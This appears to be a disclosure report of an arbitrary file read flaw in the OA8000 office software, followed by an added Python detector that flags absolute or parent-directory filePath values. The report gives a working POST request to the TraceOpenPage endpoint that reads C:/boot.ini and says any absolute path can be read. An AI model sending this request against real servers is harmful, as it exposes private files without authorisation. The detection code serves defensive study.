### Brief description:
Just another bug.
### Details:
Using the official site http://demo.oa8000.com/ as an example,
user:123456
After logging in,
POST the following parameters to http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa/wa/TraceOpenPage:
fileType=txt&jumpToPage=HtFile0141&initFromJsp=true&filePath=C%3A%2Fboot.ini&updateFlg=false
Changing filePath to the absolute path of the target file is enough to read it.
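
For detection, the following added example (not part of the original report or the vendor's code) scans captured requests to the TraceOpenPage endpoint and flags `filePath` values that are absolute or contain parent-directory segments. It assumes legitimate requests carry only relative file names; the record format, the `OtherPage` endpoint and all sample traffic except the first body are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter name come from the report.
ENDPOINT_SUFFIX = "/OAapp.woa/wa/TraceOpenPage"
DRIVE = re.compile(r"^[A-Za-z]:")

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %252F is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_file_path(value):
    """Return why a filePath value breaks a relative-name policy, or None."""
    p = fully_decode(value).replace("\\", "/")
    if DRIVE.match(p):
        return "drive-letter path"
    if p.startswith("//"):
        return "UNC path"
    if p.startswith("/"):
        return "rooted path"
    if ".." in p.split("/"):
        return "parent-directory segment"
    return None

def scan(records):
    """records: (method, url, body) tuples; returns [(filePath, reason), ...]."""
    findings = []
    for _method, url, body in records:
        parts = urlsplit(url)
        if not parts.path.endswith(ENDPOINT_SUFFIX):
            continue
        # The parameter may arrive in the query string or in the form body.
        for source in (parts.query, body):
            for value in parse_qs(source).get("filePath", []):
                reason = classify_file_path(value)
                if reason:
                    findings.append((fully_decode(value), reason))
    return findings

BASE = "http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa/wa/"
SAMPLE = [  # constructed traffic; only the first body is the report's request
    ("POST", BASE + "TraceOpenPage", "fileType=txt&jumpToPage=HtFile0141&initFromJsp=true&filePath=C%3A%2Fboot.ini&updateFlg=false"),
    ("POST", BASE + "TraceOpenPage", "fileType=txt&filePath=C%253A%252Fboot.ini"),
    ("POST", BASE + "TraceOpenPage", "fileType=txt&filePath=trace%2Freport.txt"),
    ("POST", BASE + "OtherPage", "filePath=C%3A%2Fboot.ini"),  # hypothetical endpoint
]
```

The same `classify_file_path` policy can serve as a server-side input check, but the durable fix is for the handler to resolve the requested name against a fixed base directory and reject anything that lands outside it.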
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201406/20222826a37cc30a760461454c9251aa6cde254b.png" alt="1.png" width="600">](https://images.seebug.org/upload/201406/20222826a37cc30a760461454c9251aa6cde254b.png)
[<img src="https://images.seebug.org/upload/201406/20222837c565c6e19b73037247920140ad3edfaf.png" alt="2.png" width="600">](https://images.seebug.org/upload/201406/20222837c565c6e19b73037247920140ad3edfaf.png)